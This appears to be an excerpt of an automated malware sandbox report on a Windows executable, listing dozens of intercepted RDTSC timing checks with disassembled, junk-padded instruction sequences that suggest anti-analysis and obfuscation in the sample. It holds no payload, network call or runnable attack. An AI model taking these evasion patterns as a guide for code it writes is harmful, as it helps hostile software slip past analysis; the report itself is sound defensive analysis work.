              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76EB2D second address: 76EB33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76EB33 second address: 76EB5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F9F08C2F7EEh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 76EB5E second address: 76EB65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D20495 second address: 4D20499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D20499 second address: 4D2049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D2049F second address: 4D204CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, cl 0x00000005 mov bx, 5C98h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9F08C2F7E9h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D204CA second address: 4D204D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D204D0 second address: 4D20517 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F9F08C2F7E0h 0x00000011 mov ecx, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F9F08C2F7DDh 0x0000001d jmp 00007F9F08C2F7DBh 0x00000022 popfd 0x00000023 movzx esi, di 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D407FF second address: 4D4080F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2E4BCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D4080F second address: 4D40853 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F9F08C2F7DBh 0x00000016 or ah, FFFFFFAEh 0x00000019 jmp 00007F9F08C2F7E9h 0x0000001e popfd 0x0000001f mov cx, EA37h 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40853 second address: 4D408E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov ecx, 5DEF36C3h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 call 00007F9F08C2E4C4h 0x00000018 pop eax 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushfd 0x00000024 jmp 00007F9F08C2E4C8h 0x00000029 jmp 00007F9F08C2E4C5h 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 jmp 00007F9F08C2E4BEh 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a call 00007F9F08C2E4BDh 0x0000003f pop esi 0x00000040 push edx 0x00000041 pop esi 0x00000042 popad 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D408E1 second address: 4D408FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, 47h 0x0000000d mov edi, eax 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D408FD second address: 4D40901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40901 second address: 4D40907 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40907 second address: 4D40940 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F08C2E4C6h 0x00000009 sub eax, 156C7638h 0x0000000f jmp 00007F9F08C2E4BBh 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a lea eax, dword ptr [ebp-04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40940 second address: 4D40945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40945 second address: 4D4094B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D4094B second address: 4D4094F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D4094F second address: 4D4097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F9F08C2E4C9h 0x00000011 pop ecx 0x00000012 mov bx, EEA4h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D4097A second address: 4D409D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ah 0x00000005 pushfd 0x00000006 jmp 00007F9F08C2F7E5h 0x0000000b or ax, 2796h 0x00000010 jmp 00007F9F08C2F7E1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov edi, 6F219CD2h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9F08C2F7E9h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40A56 second address: 4D30214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 jmp 00007F9F08C2E4C5h 0x0000000d leave 0x0000000e jmp 00007F9F08C2E4BEh 0x00000013 retn 0004h 0x00000016 nop 0x00000017 sub esp, 04h 0x0000001a xor ebx, ebx 0x0000001c cmp eax, 00000000h 0x0000001f je 00007F9F08C2E61Ah 0x00000025 mov dword ptr [esp], 0000000Dh 0x0000002c call 00007F9F0D3CA802h 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 call 00007F9F08C2E4BDh 0x00000039 pushfd 0x0000003a jmp 00007F9F08C2E4C0h 0x0000003f sbb ecx, 00B459C8h 0x00000045 jmp 00007F9F08C2E4BBh 0x0000004a popfd 0x0000004b pop ecx 0x0000004c popad 0x0000004d push esi 0x0000004e pushad 0x0000004f call 00007F9F08C2E4BEh 0x00000054 pop edi 0x00000055 popad 0x00000056 mov dword ptr [esp], ebp 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F9F08C2E4C5h 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30214 second address: 4D30229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30229 second address: 4D30289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F9F08C2E4C3h 0x00000014 add esi, 3194582Eh 0x0000001a jmp 00007F9F08C2E4C9h 0x0000001f popfd 0x00000020 call 00007F9F08C2E4C0h 0x00000025 pop esi 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30289 second address: 4D302DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ch 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b pushad 0x0000000c jmp 00007F9F08C2F7E2h 0x00000011 mov si, FBA1h 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ax, di 0x0000001d pushfd 0x0000001e jmp 00007F9F08C2F7E5h 0x00000023 adc al, 00000026h 0x00000026 jmp 00007F9F08C2F7E1h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D302DF second address: 4D3031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007F9F08C2E4BBh 0x00000012 jmp 00007F9F08C2E4C8h 0x00000017 pop ecx 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movzx esi, dx 0x00000020 push edi 0x00000021 pop eax 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3036A second address: 4D30370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30370 second address: 4D303AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F9F08C2E4C0h 0x0000000b xor al, 00000078h 0x0000000e jmp 00007F9F08C2E4BBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 sub ebx, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9F08C2E4C2h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D303AE second address: 4D303B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D303B3 second address: 4D30453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9F08C2E4C7h 0x0000000a xor ah, FFFFFF9Eh 0x0000000d jmp 00007F9F08C2E4C9h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 sub edi, edi 0x00000018 jmp 00007F9F08C2E4C7h 0x0000001d inc ebx 0x0000001e pushad 0x0000001f movzx ecx, di 0x00000022 jmp 00007F9F08C2E4C1h 0x00000027 popad 0x00000028 test al, al 0x0000002a pushad 0x0000002b mov al, 61h 0x0000002d mov ax, dx 0x00000030 popad 0x00000031 je 00007F9F08C2E6C6h 0x00000037 pushad 0x00000038 mov edi, 54A518D4h 0x0000003d mov si, di 0x00000040 popad 0x00000041 lea ecx, dword ptr [ebp-14h] 0x00000044 jmp 00007F9F08C2E4BFh 0x00000049 mov dword ptr [ebp-14h], edi 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push esi 0x00000050 pop edx 0x00000051 popad 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30475 second address: 4D30490 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30490 second address: 4D30504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9F08C2E4C3h 0x00000013 jmp 00007F9F08C2E4C3h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007F9F08C2E4C8h 0x0000001f sub ax, 5938h 0x00000024 jmp 00007F9F08C2E4BBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30504 second address: 4D30550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 push ebx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F9F08C2F7E9h 0x00000014 pushfd 0x00000015 jmp 00007F9F08C2F7E0h 0x0000001a xor ecx, 5D63FDF8h 0x00000020 jmp 00007F9F08C2F7DBh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30550 second address: 4D30556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D305BC second address: 4D305C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D305C2 second address: 4D305C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D305C6 second address: 4D30615 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F9F7995D694h 0x0000000e pushad 0x0000000f mov cl, bl 0x00000011 jmp 00007F9F08C2F7DEh 0x00000016 popad 0x00000017 js 00007F9F08C2F828h 0x0000001d jmp 00007F9F08C2F7E0h 0x00000022 cmp dword ptr [ebp-14h], edi 0x00000025 pushad 0x00000026 jmp 00007F9F08C2F7DEh 0x0000002b push eax 0x0000002c push edx 0x0000002d mov esi, 726AB597h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30615 second address: 4D30697 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 031B1433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007F9F7995C332h 0x00000010 pushad 0x00000011 jmp 00007F9F08C2E4C4h 0x00000016 mov dx, cx 0x00000019 popad 0x0000001a mov ebx, dword ptr [ebp+08h] 0x0000001d jmp 00007F9F08C2E4BCh 0x00000022 lea eax, dword ptr [ebp-2Ch] 0x00000025 jmp 00007F9F08C2E4C0h 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushad 0x0000002d mov cl, ABh 0x0000002f jmp 00007F9F08C2E4C9h 0x00000034 popad 0x00000035 jmp 00007F9F08C2E4C0h 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30697 second address: 4D3069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3069B second address: 4D306A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D306A1 second address: 4D306CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 06ED6B58h 0x00000008 mov edx, 6879E504h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 jmp 00007F9F08C2F7E3h 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D306CB second address: 4D306FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9F08C2E4C1h 0x0000000a add eax, 7B5E21A6h 0x00000010 jmp 00007F9F08C2E4C1h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D306FA second address: 4D3072B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F08C2F7E7h 0x00000008 movzx eax, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9F08C2F7DCh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3072B second address: 4D3073A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3073A second address: 4D30740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30740 second address: 4D30782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F9F08C2E4C6h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9F08C2E4C7h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30782 second address: 4D307A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D307A6 second address: 4D307AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D307AA second address: 4D307B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D307B0 second address: 4D307C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2E4C0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D307C4 second address: 4D307C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D307C8 second address: 4D307DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9F08C2E4BAh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30831 second address: 4D30849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2F7E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30849 second address: 4D3084D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3084D second address: 4D3085D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3085D second address: 4D30863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30863 second address: 4D3001F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F9F7995D5B9h 0x0000000f xor eax, eax 0x00000011 jmp 00007F9F08C08F0Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e sub esp, 04h 0x00000021 mov esi, eax 0x00000023 xor ebx, ebx 0x00000025 cmp esi, 00000000h 0x00000028 je 00007F9F08C2F915h 0x0000002e call 00007F9F0D3CB81Ch 0x00000033 mov edi, edi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F9F08C2F7E9h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3001F second address: 4D30025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30025 second address: 4D30043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F9F08C2F7DDh 0x00000011 mov ax, C787h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30043 second address: 4D30049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30049 second address: 4D3004D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3004D second address: 4D300F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F9F08C2E4C6h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9F08C2E4BEh 0x0000001c xor eax, 5EED06C8h 0x00000022 jmp 00007F9F08C2E4BBh 0x00000027 popfd 0x00000028 mov di, ax 0x0000002b popad 0x0000002c xchg eax, ecx 0x0000002d pushad 0x0000002e mov bx, cx 0x00000031 pushad 0x00000032 mov eax, 6A383F09h 0x00000037 pushfd 0x00000038 jmp 00007F9F08C2E4C6h 0x0000003d jmp 00007F9F08C2E4C5h 0x00000042 popfd 0x00000043 popad 0x00000044 popad 0x00000045 push eax 0x00000046 jmp 00007F9F08C2E4C1h 0x0000004b xchg eax, ecx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D300F6 second address: 4D300FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D300FA second address: 4D300FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D300FE second address: 4D30104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30159 second address: 4D3015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D3015F second address: 4D30165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30165 second address: 4D30169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30169 second address: 4D30198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F08C2F7DDh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30198 second address: 4D301A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F08C2E4BCh 0x00000009 rdtsc
